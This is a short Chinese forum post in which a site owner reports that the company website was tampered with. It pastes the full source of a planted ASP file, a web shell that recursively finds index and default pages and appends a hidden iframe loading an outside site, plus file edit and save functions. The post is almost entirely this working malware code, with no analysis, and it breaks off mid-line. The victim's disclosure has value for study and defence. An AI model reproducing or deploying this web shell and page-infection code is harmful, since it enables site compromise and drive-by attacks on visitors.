日期:2014-05-17  浏览次数:20850 次

公司网站内容被撰改!把网站文件拷下一看,冷汗!
公司网站内容被撰改,开始怀疑是   SQL驻入,但是刚把网站文件一搜索。汗!
里面目录下有个
\aspnet_client\system_web\1_0_2914_16\newup.asp
打开一看:好毒啊!不知道是谁放进来!!
<%Server.ScriptTimeout=10000
Response.Buffer=False
%>
<html>
<head>
<title> By   S.D.I-E路 </title>
S.D.I--核心专用   shell
</head>
<body>
<%
ASP_SELF=Request.ServerVariables( "PATH_INFO ")
s=Request( "fd ")
ex=Request( "ex ")
pth=Request( "pth ")
newcnt=Request( "newcnt ")
If   ex <> " "   AND   pth <> " "   Then
select   Case   ex
Case   "edit "
CALL   file_show(pth)
Case   "save "
CALL   file_save(pth)
End   select
Else
%>
<form   action= " <%=ASP_SELF%> "   method= "POST ">
输入要挂马的路径:
<input   type= "text "   name= "fd "   size= "40 ">
<input   type= "submit "   value= "开始 ">
</form>
<%End   If%>
<%
Function   IsPattern(patt,str)
Set   regEx=New   RegExp
regEx.Pattern=patt
regEx.IgnoreCase=True
retVal=regEx.Test(str)
Set   regEx=Nothing
If   retVal=True   Then
IsPattern=True
Else
IsPattern=False
End   If
End   Function
If   IsPattern( "[^ab]{1}:{1}(\\|\/) ",s)   Then
sch   s
Else
If   s <> " "   Then   Response.Write   "Invalid   Agrument! "
End   If
Sub   sch(s)
oN   eRrOr   rEsUmE   nExT
Set   fs=Server.createObject( "Scripting.FileSystemObject ")
Set   fd=fs.GetFolder(s)
Set   fi=fd.Files
Set   sf=fd.SubFolders
For   Each   f   in   fi
rtn=f.Path
step_all   rtn
Next
If   sf.Count <> 0   Then
For   Each   l   In   sf
sch   l
Next
End   If
End   Sub
Sub   step_all(agr)
retVal=IsPattern( "(\\|\/)(default|index)\.(htm|html|asp|php)\b ",agr)
If   retVal   Then
step1   agr
step2   agr
Else
Exit   Sub
End   If
End   Sub
%>
<%Sub   step1(str1)%>
<a   href= " <%=ASP_SELF%> ?ex=edit&pth= <%=str1%> "   target= "_blank "> <%=str1%> </a> <br>
<%End   Sub%>
<%
Sub   step2(str2)
addcode= " <iframe   src=http://www.00sj.com   width=0   height=0   frameborder=0> </iframe> "
Set   fs=Server.createObject( "Scripting.FileSystemObject ")
isExist=fs.FileExists(str2)
If   isExist   Then
Set   f=fs.GetFile(str2)
Set   f_addcode=f.OpenAsTextStream(8,-2)
f_addcode.Write   addcode
f_addcode.Close
Set   f=Nothing
End   If
Set   fs=Nothing
End   Sub
%>
<%
Sub   file_show(fname)
Set   fs1=Server.createObject( "Scripting.FileSystemObject ")
isExist=fs1.FileExists(fname)
If   isExist   Then
Set   fcnt=fs1.OpenTextFile(fname)
cnt=fcnt.ReadAll
fcnt.Close
Set